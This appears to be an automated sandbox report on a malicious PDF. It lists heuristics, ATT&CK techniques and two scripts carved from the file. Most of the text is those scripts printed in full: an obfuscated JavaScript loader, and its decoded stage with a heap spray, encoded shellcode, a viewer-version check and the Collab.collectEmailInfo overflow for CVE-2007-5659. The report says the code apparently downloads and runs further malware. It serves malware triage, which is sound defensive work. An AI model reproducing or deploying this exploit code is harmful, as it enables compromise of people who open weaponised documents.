MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
This PDF file contains embedded JavaScript that exploits CVE-2007-5659 (Collab.collectEmailInfo). The JavaScript is heavily obfuscated but appears to be designed to download and execute a second-stage payload. The ML classifier strongly indicates maliciousness, and the exploit cluster confirms the presence of known PDF exploit techniques.
Machine Learning
- Nyx PDF Classifier malicious score 0.9993
Heuristics 8
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/iX/1.0/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0016_000.js |
pdf-javascript-stream | PDF /JS object 16 at offset 0x931 | 6899 bytes |
SHA-256: 35cdeb42e41bd23004c73eee0c3acc64e6836bf0309f22e64671bcb2bea6041b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function kpoU7OeoR(drj4wuUD5, EIxl112UO){var B3TB261qG = arguments.callee;var M36Xe7f0e = 4294967296;B3TB261qG = B3TB261qG.toString();B3TB261qG = B3TB261qG;var X6UYw2p73 = eval;var K0Y856YcQ = B3TB261qG.replace(/\W/g, "");K0Y856YcQ = K0Y856YcQ.toUpperCase();var JXbVcDQ6I = new Array;for(var e2Uah253D = 0; e2Uah253D < 256; e2Uah253D++) {JXbVcDQ6I[e2Uah253D] = 0;}var u1APXrrB8 = 1;for(var e2Uah253D = 128; e2Uah253D; e2Uah253D >>= 1) {u1APXrrB8 = u1APXrrB8 >>> 1 ^ (u1APXrrB8 & 1 ? 3988292384 : 0);for(var JVjE0K8du = 0; JVjE0K8du < 256; JVjE0K8du += e2Uah253D * 2) {var Y65Hsa067 = e2Uah253D + JVjE0K8du;JXbVcDQ6I[Y65Hsa067] = JXbVcDQ6I[JVjE0K8du] ^ u1APXrrB8;if (JXbVcDQ6I[Y65Hsa067] < 0) {JXbVcDQ6I[Y65Hsa067] += M36Xe7f0e;}}}var I01r2v650 = M36Xe7f0e - 1;for(var x235o8dkj = 0; x235o8dkj < K0Y856YcQ.length; x235o8dkj++) {var oVm37V0P8 = (I01r2v650 ^ K0Y856YcQ.charCodeAt(x235o8dkj)) & 255;I01r2v650 = (I01r2v650 >>> 8) ^ JXbVcDQ6I[oVm37V0P8];}I01r2v650 = I01r2v650 ^ (M36Xe7f0e - 1);if (I01r2v650 < 0) {I01r2v650 += M36Xe7f0e;}I01r2v650 = I01r2v650.toString(16).toUpperCase();while(I01r2v650.length < 8) {I01r2v650 = "0" + I01r2v650;}var gkVQ4BN5e = new Array;for(var e2Uah253D = 0; e2Uah253D < 8; e2Uah253D++) {gkVQ4BN5e[e2Uah253D] = I01r2v650.charCodeAt(e2Uah253D);}var H14b80C2k = "";var fsv7c0rhG = 0;for(var e2Uah253D = 0; e2Uah253D < drj4wuUD5.length; e2Uah253D += 2){var Y65Hsa067 = drj4wuUD5.substr(e2Uah253D, 2);var O5A624507 = parseInt(Y65Hsa067, 16);var le48722Fb = O5A624507 - gkVQ4BN5e[fsv7c0rhG];if(le48722Fb < 0) {le48722Fb = le48722Fb + 256;}H14b80C2k += String.fromCharCode(le48722Fb);if(fsv7c0rhG + 1 == gkVQ4BN5e.length) {fsv7c0rhG = 0;} else {fsv7c0rhG++;}}var p88s7XL5j = 0;try {X6UYw2p73(H14b80C2k);} catch(e) {p88s7XL5j = 1;}try {if (p88s7XL5j) {window.location = "/";}} catch(e) {}}
kpoU7OeoR('404caeA2A757A86789856b777caf657153B09dB85578B7a694bb606A70444f413da8adAF98abaeA3a16291a4a76bBEAA789160ADA1a08Fa897a98D6D5590b6876AA89A898E60523Eae4F424aac9faea0986260adA1a08fa897a98D6FA19CB39Ba7aa62737190b6876aA89a898E6065af404C414aA1A3ae7EA7A69F96556282549fAEA18Ba99BAC896E4F424aB2444F413D4ba4AD9E81b9989a97587E55a3B19D7Db69Ca88A65B8a995b5ACb39ea5ac5c636e91B2886Eab967B9b67735e72523e404C41b39AABbaa6A162a4ad9E81b9989a97734e3fB4523E404C9eb6a39ab99dA2b058a5846A799D7db4A8695e444Faf404c41b796a96576868e8072797Abc54706268B9659A759763A568A470444F3da9a3aa61a1b1916a6b959288557465A9a1a7aba496a7aa5c5567AD71659C7D59A8726871655cba6997726866AA9A7A6C6667ADA36e687959A872697a685cBA6463726866aa98a6966367AD756a6a7559A8766D71655cBA6b68767166aa9ca79A6C67ad7496677559A8759974965Cba6794759966AA6aa6679467ad75686AA659a8A399766B5Cba9594A39966aa9Aaa9a6867ad7A9667a759a8A399A2965CBA9865A39966aa6976956967ada26B9CA659a8A69973665CBA646aA46E66AA9A77666467ad7566987759a87469a2685CBA6d98a79966aa9ca6666A67AD73669B7b59A87B6eA4675cBA6997746966AA98aa976367AD75679D7859A8A399736a5Cba9594a39966AA6c78686B67ada46A9a7759a8a399A4695cBA9765A39966aa9b7D989967ADa46c9a7b59a8776dA79a5CBA6664A49b66AA6B77686567adA2969B7859a8A399a2965Cba6B97746966aa69A6999767ADa296707A59A87768A59b5CBA9a97a79C66AA69a6999767ada296707A59a87768a59B5cBA6868746966AA707e9A6867ad73976d7859a8A39D756B5Cba9594A39a66AA6976959467adA7976e7b59A8A871A76D5Cba9598a56a66AA98A6959567ad766a98a659A8a36eA7985CBA9A66A86866aa9D7D9a9567ada26d697659a8A771a76e5CBA6d64749966AA9bab959467ad73976c7559A8776EA5665cBA97997A6C66aa9aab986567ADA26e9bab59A87669736E5Cba6666A36a66AA6DA9956c67adA29a9c7E59a8a59e79695CBA9799a66a66AA9c7E6a9667ada296987759A87468a7665CBA9598789a66aa69776d9467ADA2969Cab59a878997A6e5cBA9A94A89966AA9dA99A6c67AD766A9DA659a8a499A7985cBA6965747166aa9bab959467ADA46598a859a8A871A2975cba9A96776d66AA9D75959867AD736e9d7859a8a39D776D5CBA6694a79A66aa98a66d6367ad729a9bab59a8a89b766a5Cba9a95A36a66aa69769a9667ad7A6b9bab59A8a69d73665CBA98657A6C66aa6CAB956c67AD73669Da859A87a99A5985cba6999a37166AA6d786d6C67ADa6979c7859a8A371716c5CBA6D6C789E66AA987a6b6467ADA396687959A8799B7a655cba9565A69d66aa6d766A9567adA26E987C59a8a79978655Cba6995766966aa997A6D6467AD75999bAB59a87469A7695CBA6C98A86C66aa6E7c956C67AD73669aa859a8A769A26B5cba9A67746966AA987e96
... (truncated)
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | CRC32 callee-key hex decoded JavaScript at offset 0x931 | 2536 bytes |
SHA-256: 2eeb92b4ce3a10b37333c6cf2d1f5a6e657301fe948a7d6f4f6bddbb4c977cf1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var c3VC36Gx = new Array();
function Ycr4yvEO(lliJtdgU, YqS7fbHY)
{
while (lliJtdgU.length*2<YqS7fbHY) {
lliJtdgU += lliJtdgU;
}
lliJtdgU = lliJtdgU.substring(0,YqS7fbHY/2);
return lliJtdgU;
}
function dO34iJrp()
{
var BSLH1DCw = 0x0c0c0c0c;
var lzL68SZG = unescape("%u00e8%u0000%u5d00%uc583%ub914%u0193%u0000%uaab0%u4530%u4500%u7549%uebf9%u3a00%u3a3a%u3a3a%u3a3a%u433a%uaa56%uaaaa%ucef5%u9a0b%uaaaa%ud2aa%u21a6%ua6ea%uda21%u07b6%uc221%u41a2%u21a3%u9eea%uea27%u21d6%u96c2%u5d21%uaec0%u42f3%uaa25%uaaaa%u5348%uc5c2%uaac4%uc2aa%ud8df%uc7c6%u55fe%u21bc%u4242%uaad3%uaaaa%u7d21%u2aed%uaa95%u50df%ufded%u2aed%uaa95%u50df%u4521%u99f5%u2b63%uae46%uaaab%u21aa%ufb76%uf9f8%uaec2%uaaab%u55aa%ua6fc%uf3f0%uf8fb%ua821%ue9f9%u912a%udfaa%u2b50%u56d1%ucf84%ucfd2%ua9df%u4129%u23a2%u6da9%uaee9%ucf84%ucfd2%ue96c%uaaa2%u20f1%uae6b%u229a%uaaef%u6a99%ufafa%ufdf9%u55fa%ubafc%u5229%udfaa%uc0ac%uf9ab%ufc55%uf0ae%u29f3%uae68%u2aeb%uaa90%u1edf%ufc55%ufba2%u21fc%u96df%ude21%ud284%u5fa9%u21fc%u8adc%u5fa9%u6399%uebe3%ua907%u996f%ua571%uba14%u7c90%ua2de%u616b%ua9a7%uea70%u5b41%ub591%u4ddf%u21f4%u8ef4%u77a9%u21cc%ue1a6%uf421%ua9b6%u2177%u21ae%u6fa9%uf401%u69f3%u5542%u5554%u2455%ua4e4%u3246%u2054%ud4a4%u4872%u99d9%u2060%u9cf1%u85b0%uc5da%ufbda%uf9ed%ud3de%uaaeb%udec2%udade%u8590%ucd85%udecf%uc5c7%udfce%ucfc6%ucbc2%ucec4%ucfc6%uc484%udecf%ud985%ucbcf%uc9d8%u84c2%ucdc9%u95c3%u9b9c%u999b%ucc9e%u9d99%u9b9a%u9a9a%u9acc%u9a9c%u989a%u9cc9%ucb9c%u9a9c%ucfcb%u9c9a%u9a9a%u9a9a%u9a9a%u9a9a%u989a%u9398%u989c%u9a9e%u9e9d%u9a9a%u999a%u9e9a%u939a%u9a9a%u9a9a%u989a%u99c9%u9d9b%uaa9a");
var JYSj6v3C = 0x400000;
var S7jicAtd = lzL68SZG.length * 2;
var YqS7fbHY = JYSj6v3C - (S7jicAtd+0x38);
var lliJtdgU = unescape("%u9090%u9090");
lliJtdgU = Ycr4yvEO(lliJtdgU, YqS7fbHY);
var J_kr2KlP = (BSLH1DCw - 0x400000)/JYSj6v3C;
for (var I0U23sek=0;I0U23sek<J_kr2KlP;I0U23sek++) {
c3VC36Gx[I0U23sek] = lliJtdgU + lzL68SZG;
}
}
function mWCpJpgs()
{
var pKWPxg6Y = app.viewerVersion.toString();
pKWPxg6Y = pKWPxg6Y.replace(/\D/g,'');
var cJdVWEVR = new Array(
pKWPxg6Y.charAt(0),
pKWPxg6Y.charAt(1),
pKWPxg6Y.charAt(2));
if ((cJdVWEVR[0] == 8 && ((cJdVWEVR[1] == 1 && cJdVWEVR[2] < 2) || cJdVWEVR[1] < 1)) ||
(cJdVWEVR[0] == 7 && cJdVWEVR[1] < 1) ||
(cJdVWEVR[0] < 7)) {
dO34iJrp();
var Ek9ZLLcr = unescape("%u0c0c%u0c0c");
while(Ek9ZLLcr.length < 44952) Ek9ZLLcr += Ek9ZLLcr;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: Ek9ZLLcr});
}
}
mWCpJpgs();
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.